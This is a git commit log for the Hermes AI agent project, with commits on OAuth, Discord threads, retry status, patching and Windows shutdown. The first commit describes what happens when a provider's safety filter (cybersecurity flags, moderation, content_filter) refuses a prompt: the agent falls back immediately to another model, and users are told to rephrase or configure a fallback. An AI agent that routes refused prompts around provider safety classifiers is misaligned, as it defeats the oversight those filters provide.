kshitij	0554ef1aa3	fix(agent): fallback immediately on provider content-policy blocks (#33883 ) * fix(agent): fallback immediately on provider content-policy blocks Provider safety-filter refusals (e.g. OpenAI Codex 'flagged for possible cybersecurity risk', OpenAI moderation 'violates our usage policies', Anthropic safety-system rejections, Azure content_filter) are deterministic decisions about a specific prompt. Retrying the same prompt up to api_max_retries times just reproduces the same refusal and burns paid attempts before surfacing the generic 'API failed after 3 retries — <provider message>' to Telegram / cron with no indication that the failure came from the model provider rather than Hermes itself. Classify these as a new FailoverReason.content_policy_blocked (non-retryable, should_fallback=True) and route them through the existing is_client_error path so the loop: - skips the 3x retry backoff - activates a configured fallback model immediately - emits a clear provider-safety message to the user (not the generic 'Non-retryable error (HTTP None)') and surfaces actionable guidance when no fallback is configured (rephrase, narrow context, or set fallback_model in hermes config) - returns a final_response that explicitly tells the user this came from the model provider, so gateway delivery is unambiguous and cron last_status reflects the safety block rather than a vague 'agent reported failure' Patterns are intentionally narrow — verbatim refusal phrasings keyed to specific provider safety pipelines, not generic words like 'policy' or 'violation' that would collide with billing / format / auth errors. Regression guards in test_18028_content_policy_blocked.py verify billing 402s, generic 400s, and OpenRouter account-level provider_policy_blocked remain distinct classifications. Salvaged from #18164 onto current main (file restructure: loop logic moved from run_agent.py to agent/conversation_loop.py, _emit_status → _buffer_status), broadened patterns beyond the original OpenAI Codex cybersecurity case to cover OpenAI moderation, Anthropic safety system, and Azure content_filter; added user-actionable guidance and a clear final_response so cron/gateway surfaces the policy block instead of a generic non-retryable error, and added a regression-guard test module mirroring the is_client_error predicate. Addresses #18028. Co-authored-by: Kuan-Chieh Huang <kchuang1015@users.noreply.github.com> * chore: add kchuang1015 to AUTHOR_MAP --------- Co-authored-by: Kuan-Chieh Huang <kchuang1015@users.noreply.github.com>	2026-05-28 07:28:24 -07:00
kshitij	a82c88bac0	fix(xai-oauth): accept bare-code manual paste (state=None) (#26923 ) (#33880 ) xAI's consent page renders the authorization code in-page rather than redirecting through the 127.0.0.1 callback, so on remote/headless setups (GCP Cloud Shell, Codespaces, container consoles, headless VPS) the only value the user can paste is the opaque code with no `code=`/`state=` query parameters. `_parse_pasted_callback` correctly returns `state=None` for that input, but `_xai_oauth_loopback_login` then validated state unconditionally and raised `xai_state_mismatch`, making the documented bare-code paste path unreachable. PKCE (code_verifier) still binds the token exchange to this client, so the local state-equality check is redundant when there is no state to compare. On the manual-paste path only, substitute the locally generated state when the callback returned none — the rest of the validation chain (code presence, error field, token exchange) is unchanged. The loopback HTTP-server path still requires a matching state (a real browser redirect always carries one). Also: clarify the manual-paste prompt to mention xAI's in-page code rendering so users know pasting the bare code on its own is expected. Root-cause analysis from #26923 comment by @AccursedGalaxy (2026-05-20). Tests ----- * test_xai_loopback_login_manual_paste_bare_code_succeeds — positive end-to-end through the token exchange with state=None. * test_xai_loopback_login_loopback_path_rejects_missing_state — the HTTP-server path still rejects state=None as a regression guard (the bare-code relaxation must NOT widen the loopback path). * Existing test_xai_loopback_login_manual_paste_state_mismatch_raises continues to verify wrong (non-None) state is rejected on manual-paste. Closes #26923.	2026-05-28 05:47:30 -07:00
helix4u	c0d04694ea	docs(email): clarify gateway vs Himalaya setup	2026-05-28 05:42:09 -07:00
Teknium	67011cc0d7	feat(agent): buffer retry/fallback status, surface only on terminal failure (#33816 ) Users report that the CLI/gateway floods them with confusing retry chatter during transient failures: a single 429 can produce 10+ "Provider/Endpoint/ Retrying in 5s..." lines before the request eventually succeeds. The same firehose hits Telegram, Discord, Slack, etc. via _emit_status. This patch defers all retry/fallback/compression status messages until we know the outcome: - if the turn ultimately succeeds (any path: primary recovers, fallback activates, compression unsticks the request), the buffer is silently dropped — the user sees nothing. - if every retry and fallback exhausts and the turn fails, the buffer is flushed at the terminal-failure return so the user sees the full retry trace alongside the final error. Backend logging (agent.log) is unchanged — every emission site still writes to logger.warning/info, so post-mortem diagnosis is intact. ## What changed run_agent.py: four new methods on AIAgent: _buffer_status(msg) — defer an _emit_status call _buffer_vprint(msg) — defer a _vprint(force=True) line _clear_status_buffer() — drop pending messages on success _flush_status_buffer() — replay pending messages on terminal failure agent/conversation_loop.py: - converted ~30 mid-process emit/vprint sites in the retry, fallback, compression, empty-response, and stream-watchdog paths to the buffered helpers - added _flush_status_buffer() at every terminal-failure return so users still see the trace when it actually matters - added _clear_status_buffer() at the "non-empty assistant content" point (NOT at "API call returned bytes" — empty responses still loop through the empty-retry path and would otherwise lose their trace between iterations) - silenced the two "(´;ω;`) oops, retrying..." / "(╥_╥) error, retrying..." spinner final-frame messages — the spinner now stops cleanly so retries leave no visible residue agent/chat_completion_helpers.py: same conversion for codex TTFB / stale- stream / fallback-activation status messages. agent/stream_diag.py: _emit_stream_drop now buffers instead of emitting directly. ## Tests tests/run_agent/test_retry_status_buffer.py: 7 unit tests covering accumulate→flush, clear-on-success, mixed kinds, empty-buffer no-op, re-buffer after flush, exception swallowing. Updated 3 existing tests that mocked _emit_status to also mock (or use) _buffer_status: - tests/run_agent/test_run_agent.py::test_empty_response_emits_status_for_gateway - tests/run_agent/test_stream_drop_logging.py (2 tests) - tests/agent/test_codex_ttfb_watchdog.py (TTFB hint test) ## Validation Live test: hermes chat -q against an unreachable endpoint with no fallback exhausts retries and prints the full trace at the end. Same flow against a working endpoint prints zero retry chatter.	2026-05-28 04:53:27 -07:00
Teknium	e0572a6def	fix(skills-hub): stop ellipsis-truncating the Identifier column (#33810 ) `hermes skills search` rendered the Identifier column with the default overflow behaviour, so long slugs (notably browse-sh — every browse-sh skill ends in a `-XXXXXX` hash that's part of the identifier) were cut to `browse-sh/weathe…`. Users copied the visible string into `hermes skills install` and got a not-found error because the hash was gone. Set overflow="fold" on the Identifier column in both search tables (`do_search` and the `_resolve_short_name` multi-match table) so long slugs wrap onto a second line instead of getting eaten. Also add a `--json` flag to `hermes skills search` (and the `/skills search` slash variant) for scripting — emits a list of {name, identifier, source, trust_level, description} objects with the full identifier, which is the right shape for copy-paste pipelines too. Closes #33674.	2026-05-28 04:53:13 -07:00
Teknium	5e1f793430	chore(web): remove web_crawl tool + provider crawl plumbing (#33824 ) The web_crawl_tool() function was an orphan — no model schema registered it, no skill or CLI command called it, and the agent had no way to invoke it. PR #32608 proposed wiring it up as a model-callable tool; we've decided not to expose crawl as a separate capability since web_search + web_extract cover the use cases we want models to have. Removed: - tools/web_tools.py: web_crawl_tool() (~230 LOC) - plugins/web/firecrawl/provider.py: supports_crawl() + crawl() - plugins/web/tavily/provider.py: supports_crawl() + crawl() - plugins/web/xai/provider.py: supports_crawl() override - agent/web_search_provider.py: supports_crawl() + crawl() ABC methods - agent/web_search_registry.py: get_active_crawl_provider() + the 'crawl' branch in _resolve() - agent/display.py: web_crawl tool-progress rendering - hermes_cli/config.py: 'web_crawl' from TAVILY_API_KEY.tools - tools/website_policy.py: stale comment reference - Tests: removed TestWebCrawlTavily class, the two website-policy web_crawl tests, the searxng/ddgs/brave-free crawl-error tests, the integration test_web_crawl method, and the test_unconfigured_crawl_emits_top_level_error test. Trimmed the capability-flag parametrize list and the WebSearchProvider ABC conformance tests. - Docs: trimmed the Crawl column from capability tables in both EN and zh-Hans, updated the developer-guide ABC table. Net: 25 files, +115/-1067. Closes #33762 (the schema-text bug only existed if #32608 landed). Supersedes #32608.	2026-05-28 04:52:42 -07:00
teknium1	b243afb68b	fix(discord): skip backfill for auto-created threads and update test fakes When auto-threading kicked in, the broadened backfill gate ran on the freshly-created thread — but the thread has no prior context to fetch, and the parent-channel reference passed to _fetch_channel_context would have leaked unrelated context (see #31467). Skip backfill when auto_threaded_channel is set. Also teach the _FakeTextChannel / _FakeThreadChannel test doubles to expose a no-op history() async generator so the broadened gate doesn't trip AttributeError → discord.Forbidden (MagicMock) → TypeError in the existing auto-thread tests. Add a regression test that asserts auto-threaded messages do not trigger backfill.	2026-05-28 04:52:02 -07:00
teknium1	68ddd6b338	refactor(discord): inline backfill gate and document intent Drop the _needed_mention local variable now that it has only one use, inline its expression as _has_mention_gap, and add a comment explaining the three backfill cases (mention-gated channel, thread, DM skip). Behaviorally identical to the prior commit; cleanup only. Co-authored-by: liuhao1024 <liuhao1024@users.noreply.github.com>	2026-05-28 04:52:02 -07:00
Pluviobyte	eafe11d456	fix(gateway): backfill Discord thread context Discord threads where the bot has already participated bypass mention gating by default, but the backfill check was still tied to the mention-needed condition. That meant follow-up thread messages could trigger a response without providing recent thread history to the session. Run history backfill for thread messages whenever backfill is enabled, while keeping DMs skipped and channel mention backfill behavior unchanged. Add a regression test for a known thread follow-up without an explicit mention. Fixes #33666 Co-authored-by: Cursor <cursoragent@cursor.com>	2026-05-28 04:52:02 -07:00
Teknium	a1eaad2fc0	perf(skills-page): lazy-fetch the catalog instead of bundling 34MB into JS (#33809 ) PR #33748 grew the live skills index from ~2k skills to ~69k, which made the previous build-time bundling strategy untenable: the skills page's JS chunk was about to balloon from ~1MB to ~35MB. Initial page load on mobile became unusable, search lagged on every keystroke against the 68k-item array, and JSON.parse blocked the main thread at startup. Three changes: 1. extract-skills.py writes skills.json + skills-meta.json into website/static/api/ instead of website/src/data/. Static-served by Vercel as /docs/api/skills.json (gzipped on the wire), same CDN that already serves skills-index.json. 2. skills/index.tsx drops the static import and fetches both files in parallel on mount. Loading state shows '…' for the count; failures surface a small error pill instead of blanking the page. 3. Search is debounced 150ms and runs against a precomputed lowercase haystack stamped onto each row at load time. Before: array-join + toLowerCase per row per keystroke on a 68k array. After: single .includes() per row, deferred until typing settles. Validation: \| \| before \| after \| \|---\|---\|---\| \| skills.json location \| src/data/ (bundled) \| static/api/ (CDN) \| \| Largest JS chunk \| would be ~35MB at 68k skills \| 659 KB \| \| Initial page render \| wait for full parse \| immediate, fetch async \| \| Per-keystroke filter \| join+lowercase x 68k rows \| single includes x 68k rows \| \| Debounce \| none \| 150ms \| Built locally for both en and zh-Hans locales; the 34MB skills.json now lives in build/api/ and is served separately rather than inlined into the page's bundle. skills.json and skills-meta.json added to .gitignore — they were already build artifacts, but the gitignore only listed skills-index.json before.	2026-05-28 03:41:43 -07:00
teknium1	6f9182cb34	fix(kanban): content-addressed corrupt-DB backup filename Repeated quarantines of an unchanged corrupt kanban.db used to amplify disk usage by N: the gateway dispatcher's 5-minute retry loop, multi- profile fleets sharing one DB, and manual reopen attempts each produced a fresh '.corrupt.<timestamp>.bak' copy of the same bytes. After 10 retries on a 100KB DB you had 11x the disk footprint of duplicate corrupt data. Derive the backup filename from a sha256 of the main DB instead of a timestamp + collision counter. Same bytes → same filename → skip the copy on retries. Different bytes (partial repair, further damage) → different filename → preserve separately. Sidecar (-wal/-shm) backups inherit the same content-addressed name. Inspired by @hanzckernel's PR #33529, simplified down to ~30 LOC: drop the persistent JSON marker file, drop the atomic temp+fsync+rename helper (shutil.copy2 is fine for a quarantine-only path), drop the gateway-side WAL/SHM fingerprint extension (the existing (path, mtime, size) tuple still gives the 5-minute retry semantics it needs), and drop the gateway-side helper extraction. The backup file existing IS the marker; no separate state needed. Test: tests/hermes_cli/test_kanban_db.py::test_repeated_corrupt_open_reuses_single_backup proves 10 retries on the same corrupt bytes produce 1 backup (was 11), and mutating the corrupt bytes produces a second backup with a different fingerprint. Refs #33529 Co-authored-by: hanzckernel <zhicheng.han@mathematik.uni-goettingen.de>	2026-05-28 03:38:09 -07:00
Teknium	432a691758	fix(update): stream + idle-kill `npm run build` so a stalled webui-build can't soft-brick the install (#33803 ) `hermes update` ran the webui build with `capture_output=True` and no timeout. On low-memory hosts (WSL2's 4 GB default, small VPSes, antivirus stalls) Vite goes silent for minutes; users see a frozen terminal, decide the update is hung, and reboot. The reboot lands after `pip install -e .` has already touched the install but before the build completes, leaving the `hermes` launcher in place while `hermes_cli` is no longer importable — i.e. `ModuleNotFoundError: No module named 'hermes_cli'` (#33788, same class as #32384). Changes: - New `_run_with_idle_timeout()` helper: streams subprocess output line-by-line (so the user sees Vite progress in real time) and kills the process if no bytes appear on stdout/stderr for 180s. The existing stale-dist fallback (#23817) then serves the previous build instead of failing the update. - `_build_web_ui()` uses the helper for `npm run build` (the actual stall site). `npm install` keeps `subprocess.run` + capture_output to preserve the existing EPERM-retry-on-Windows contract. - Both `cmd_update` call sites print `→ Core update complete. Building dashboard (optional)...` before the webui build. The CLI is fully functional at this point; a webui-build failure only affects `hermes dashboard`. Telegraphing the boundary explicitly stops users from rebooting through the build step. Tests: - `tests/hermes_cli/test_run_with_idle_timeout.py` — 4 tests covering streaming success, nonzero exit, idle-kill, and missing-binary cases. Uses real `subprocess.Popen` on tiny Python scripts; isolated in its own file so per-file canonical-runner parallelism doesn't pair it with the mock-heavy tests. - `tests/hermes_cli/test_web_ui_build.py` — updated existing tests to patch `_run_with_idle_timeout` for the build step in addition to `subprocess.run` for the install step. - `tests/hermes_cli/test_cmd_update.py::test_update_refreshes_repo_and_tui_node_dependencies` — same update. Full suite: `scripts/run_tests.sh tests/hermes_cli/` → 5646 passed, 0 failed. Fixes #33788.	2026-05-28 03:34:47 -07:00
teknium1	78be458608	fix(patch): widen new_string \t/\r unescape to all match strategies (#33733 ) Extends @liuhao1024's escape-normalized fix so the patch tool also recovers when old_string carries a real tab byte and matches via the `exact` strategy — which is the headline reproduction in the issue and the most common case in practice (LLMs frequently get old_string right because they re-read the file, but still serialize new_string's tabs as two-character `\t`). Instead of gating on the match strategy, decide per-sequence by looking at the matched region of the file: only convert `\t` -> tab and `\r` -> CR when the file region we're replacing actually contains the corresponding control byte. That mirrors the region-based heuristic in `_detect_escape_drift` and keeps legitimate writes of the literal two-character string `"\t"` (e.g. patching `sep = "\t"` in Python source) untouched — those files have a backslash+t in the matched region, not a real tab, so new_string passes through verbatim. `\n` is still excluded because newlines serialize correctly through JSON and unescaping would corrupt source escape sequences far more often than help. E2E verified against the live `patch` tool: tab-indented file + literal `\t` in new_string under both `exact` (Variant 1) and `escape_normalized` (Variant 2) strategies now produces real tab bytes; a Python source line containing `sep = "\t"` (legitimate literal backslash-t) survives a patch unchanged. Tests updated to cover both strategies and the legitimate-literal case, and to assert that `\n` is intentionally preserved. Refs #33733	2026-05-28 03:27:20 -07:00
liuhao1024	e9f3f2b34a	fix(tools): unescape common sequences in new_string when escape_normalized matches When the patch tool matches via the escape_normalized strategy, old_string contains literal \t, \n, \r sequences that get unescaped to match real control characters in the file. However, new_string was written as-is, leaving literal backslash sequences in the output. Add _unescape_common_sequences() helper and apply it to new_string when the matching strategy is escape_normalized. This ensures LLM-generated tab/newline sequences become real bytes in the patched file. Fixes #33733	2026-05-28 03:27:20 -07:00
Teknium	10ee4a729b	fix(gateway): drain on Windows `hermes gateway stop` so sessions survive restart (#33798 ) Sessions now survive `hermes gateway stop` / `restart` on native Windows. Previously the gateway died on schtasks `/End` + os.kill SIGTERM without ever running the drain loop, so the v0.13.0 session-resume feature (#21192) silently broke on Windows: `resume_pending=True` was never written, and the next boot started with a blank conversation history (issue #33778). Root cause is twofold and the reporter only identified half of it: 1. `hermes_cli/gateway_windows.py::stop()` did not write the `planned_stop_marker` before signalling. The reporter caught this. 2. The bigger reason: `asyncio.add_signal_handler` raises NotImplementedError for SIGTERM/SIGINT on Windows, so even if the marker had been written, the gateway's existing SIGTERM handler (which is what calls `runner.stop()` and the `mark_resume_pending` loop) was never invoked. Writing the marker would have been necessary-but-insufficient. The fix has two parts: * gateway/run.py: new `_run_planned_stop_watcher` daemon thread polls for the planned-stop marker file every 0.5s. When the marker appears it `loop.call_soon_threadsafe(shutdown_signal_handler, None)` — the same shutdown path a real SIGTERM would have driven, including the pre-drain `mark_resume_pending` writes (run.py:5977) and graceful drain wait. The existing signal handler already accepts `received_signal=None` and falls through to `consume_planned_stop_marker_for_self()`, so no handler changes needed. Runs on every platform as cheap belt-and-suspenders. * hermes_cli/gateway_windows.py: `stop()` now writes the marker for the running gateway PID and waits up to `agent.restart_drain_timeout` (default 30s) for the PID to exit cleanly. On clean drain, the kill sweep is non-forceful; on timeout, escalates to `kill_gateway_processes(force=True)` which routes to taskkill /T /F per `references/windows-native-support.md`. Validation: * 7 new tests in tests/gateway/test_planned_stop_watcher.py covering: marker→handler dispatch, no-marker idle, already-draining skip, not-yet-running skip, stop_event responsiveness, fire-once semantics, error tolerance. * 8 new tests in tests/hermes_cli/test_gateway_windows.py covering: marker-before-kill ordering, clean-drain skips force-kill, drain-timeout escalates to force=True, no-pid-skips-drain, invalid-pid handling, fast-exit success, timeout failure, marker-write-failure tolerance. * E2E (Linux, detached orphan): write_planned_stop_marker(pid) + `_drain_gateway_pid(pid, 5.0)` returns True in 0.5s after the victim sees the marker and exits. Tested with a double-forked subprocess so the test parent isn't holding it as a zombie. * Targeted: tests/gateway/{restart_drain,restart_resume_pending, signal,signal_format,status,shutdown_forensics,approve_deny_commands, planned_stop_watcher} + tests/hermes_cli/{gateway_windows, gateway_service} → 519/519. What was wrong with the reporter's claim (for future archaeology): they described the symptom as "no `resume_pending=True` written to `sessions.json`" — but Hermes uses `state.db` (SQLite), not `sessions.json`, and `mark_resume_pending` is called regardless of the marker (the marker only affects exit code 0 vs 1 for systemd revival semantics). The real session-loss path is the missing drain on Windows, not a missing marker. Both halves are fixed here. Closes #33778.	2026-05-28 03:25:32 -07:00
teknium1	f8896dedc8	chore(release): map biser@bisko.be -> bisko in AUTHOR_MAP	2026-05-28 03:21:00 -07:00
Biser Perchinkov	b5495db701	fix(agent): re-pad reasoning_content on cross-provider fallback to require-side providers api_messages is built once before the retry loop while the primary provider is active. When a mid-conversation fallback switches to a require-side thinking provider (DeepSeek/Kimi/MiMo), assistant turns built under a non-require primary (e.g. Codex) go out without reasoning_content and the new provider rejects the request with HTTP 400 ("reasoning_content must be passed back"). Re-apply the echo-back pad against the current provider immediately before building the request kwargs. Idempotent and a no-op unless the active provider enforces echo-back, so it covers all fallback paths without affecting normal or reject-side operation. Drafted by Claude (Opus 4.7) under human review while fixing a personal deployment. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>	2026-05-28 03:21:00 -07:00
Indigo Karasu	9179396cb7	fix(stream-consumer): only set _final_content_delivered when final response confirmed delivered In GatewayStreamConsumer._run(), _final_content_delivered was set to True based on the success of a mid-stream finalize edit, before the final finalize edit was attempted. When the final edit later failed (Telegram flood control, retry-after), _final_response_sent stayed False but _final_content_delivered was already True, so gateway/run.py suppressed its normal final send and the user saw a partial / fallback message instead of the real answer. Changes in gateway/stream_consumer.py: - Remove the premature _final_content_delivered = True at the top of the got_done block. - Set _final_content_delivered = True only when the actual final send / edit succeeds, in each finalize branch (no-finalize adapter, _message_id finalize, no-_already_sent send). - _send_fallback_final: don't set _final_response_sent = True when only some chunks were delivered; the gateway should still attempt a complete final send. Set _final_content_delivered = True alongside _final_response_sent on the success path and short-text path. - Cancellation handler: set _final_content_delivered = True alongside _final_response_sent when the best-effort final edit succeeds. Adds TestFinalContentDeliveredGuard with 3 regression tests covering the core bug scenario, the happy path, and partial fallback. Closes #33708 Closes #25010 Refs #29200 Co-authored-by: Teknium <127238744+teknium1@users.noreply.github.com>	2026-05-28 03:15:19 -07:00
Dusk1e	a91b1c8b31	fix(tirith): reject non-regular tar members during auto-install process	2026-05-28 02:49:26 -07:00

1 2 3 4 5 ...

9818 commits